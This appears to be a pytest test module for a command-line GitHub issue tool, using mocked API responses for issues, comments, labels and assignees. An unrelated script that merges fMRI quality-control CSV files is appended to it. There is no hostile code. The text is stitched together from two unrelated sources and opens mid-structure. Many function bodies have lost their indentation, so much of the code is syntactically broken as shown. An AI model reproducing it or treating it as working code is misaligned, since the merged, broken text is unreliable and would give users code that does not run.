u'url': u'https://api.github.com/repos/name/repo/issues/1',
u'pull_request': {u'diff_url': None, u'html_url': None, u'patch_url': None},
u'labels': [{u'color': u'fc2929', u'url': u'https://api.github.com/repos/name/repo/labels/bug', u'name': u'bug'}],
u'updated_at': u'2012-09-15T00:23:14Z',
u'html_url': u'https://github.com/name/repo/issues/1',
u'number': 1,
u'assignee': {u'url': u'https://api.github.com/users/name', u'login': u'name', u'avatar_url': u'http://example.com', u'id': 1, u'gravatar_id': u''},
u'state': u'closed',
u'user': {u'url': u'https://api.github.com/users/name', u'login': u'name', u'avatar_url': u'https://example.com', u'id': 1, u'gravatar_id': u''},
u'milestone': None,
u'id': 0,
u'closed_at': u'2012-09-15T00:23:14Z',
u'created_at': u'2012-09-15T00:19:10Z',
u'comments': 0}]
def mock_request_assignees(*args, **kwargs):
return [{u'login': u'name1'},
{u'login': u'name2'}]
def mock_request_show(*args, **kwargs):
return {u'body': u'body',
u'title': u"title",
u'url': u'https://api.github.com/repos/name/repo/issues/1',
u'pull_request': {u'diff_url': None, u'html_url': None, u'patch_url': None},
u'labels': [{u'color': u'fc2929', u'url': u'https://api.github.com/repos/name/repo/labels/bug', u'name': u'bug'}],
u'updated_at': u'2012-09-15T00:23:14Z',
u'html_url': u'https://github.com/name/repo/issues/1',
u'number': 1,
u'assignee': {u'url': u'https://api.github.com/users/name', u'login': u'name', u'avatar_url': u'http://example.com', u'id': 1, u'gravatar_id': u''},
u'state': u'closed',
u'user': {u'url': u'https://api.github.com/users/name', u'login': u'name', u'avatar_url': u'https://example.com', u'id': 1, u'gravatar_id': u''},
u'milestone': None,
u'id': 0,
u'closed_at': u'2012-09-15T00:23:14Z',
u'created_at': u'2012-09-15T00:19:10Z',
u'comments': 0}
def mock_request_comments(*args, **kwargs):
return [{"id": 1,
"url": "https://api.github.com/repos/octocat/Hello-World/issues/comments/1",
"body": "Me too",
"user": {
"login": "octocat",
"id": 1,
"avatar_url": "https://github.com/images/error/octocat_happy.gif",
"gravatar_id": "<PASSWORD>",
"url": "https://api.github.com/users/octocat"
},
"created_at": "2011-04-14T16:00:49Z",
"updated_at": "2011-04-14T16:00:49Z"
}]
def test_list(monkeypatch):
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(github, '_request', mock_request_list)
r = github.issues()
assert len(r) == 1
tic = r[0]
assert tic.title == u'title'
assert tic.body == u'body'
assert tic.assignee == u'name'
def test_show(monkeypatch):
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(github, '_request', mock_request_show)
tic = github.issue(0)
assert isinstance(tic, ticket.Ticket)
assert tic.title == u'title'
assert tic.body == u'body'
assert tic.assignee == u'name'
def test_comments(monkeypatch):
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(github, '_request', mock_request_comments)
r = github.comments(0)
assert len(r) == 1
com = r[0]
assert com.body == u'Me too'
assert com.creator == u'octocat'
def mock_editor(template):
    return u'''## Available labels: bug, duplicate, enhancement, invalid, question, wontfix
## Available assignees: aflc
:title: test issue
:labels: bug
:assignee: name
:milestone_id:
:body: this is a body.
'''
def mock_labels():
return ['bug', 'duplicate', 'enhancement', 'invalid', 'question', 'wontfix']
def mock_assignees():
return ['name']
def test_add(monkeypatch):
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(util, 'inputwitheditor', mock_editor)
monkeypatch.setattr(github, '_request', mock_request_show)
monkeypatch.setattr(github, 'labels', mock_labels)
monkeypatch.setattr(github, 'assignees', mock_assignees)
r = github.add()
assert r['html_url'] == u'https://github.com/name/repo/issues/1'
assert r['number'] == 1
def test_update(monkeypatch):
"""TODO: Test with the content"""
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(util, 'inputwitheditor', mock_editor)
monkeypatch.setattr(github, '_request', mock_request_show)
monkeypatch.setattr(github, 'labels', mock_labels)
monkeypatch.setattr(github, 'assignees', mock_assignees)
github.update(1)
def test_changestate(monkeypatch):
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(github, '_request', mock_request_list)
github.changestate(1, 'open')
github.changestate(1, 'closed')
with pytest.raises(ValueError):
github.changestate(1, 'close')
def test_commentto(monkeypatch):
"""TODO: Test with the content"""
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(util, 'inputwitheditor', mock_editor)
monkeypatch.setattr(github, '_request', mock_request_show)
github.commentto(1)
def test_assignees(monkeypatch):
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(github, '_request', mock_request_assignees)
r = github.assignees()
assert len(r) == 2
assert r[0] == 'name1'
assert r[1] == 'name2'
@pytest.mark.xfail(reason='placeholder: labels() listing is not implemented in this test yet')
def test_labels(monkeypatch):
    assert False
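# Usage note (module path assumed): run these tests with `pytest test_github.py -q`.
# config.git and github._request are monkeypatched above, so no git configuration
# or network access is required.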
#!/usr/bin/env python
# concatenator for audit
import pandas as pd
from pathlib import Path
import numpy as np
import sys

csv_dir = sys.argv[1]

# Use the first matching subject-level QC csv to establish the column layout
# (pattern: sub-*rest*multiband*fsLR_desc-qc_bold.csv).
columns = None
for csv_path in Path(csv_dir).rglob('sub-*rest*multiband*fsLR_desc-qc_bold.csv'):
    columns = list(pd.read_csv(str(csv_path)).columns)
    break

df = pd.DataFrame(np.nan, index=range(0, 1), columns=columns, dtype="string")
print(df.columns)
for csv_path in Path(csv_dir).rglob('sub-*rest*multiband*fsLR_desc-qc_bold.csv'):
sub_df = pd.read_csv(str(csv_path))
df = pd.concat([df, sub_df])
df.dropna(how='all', inplace=True)
print("OUTPUT FILE", sys.argv[2])
print("OUTPUT", df.columns)
df.to_csv(sys.argv[2], index=False)
# THEN RUN THIS THROUGH THE SUMMARY REPORT SCRIPTS!
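# A usage sketch -- the script filename is an assumption:
#   python concat_qc_csvs.py /path/to/fmri_derivatives all_subjects_qc.csv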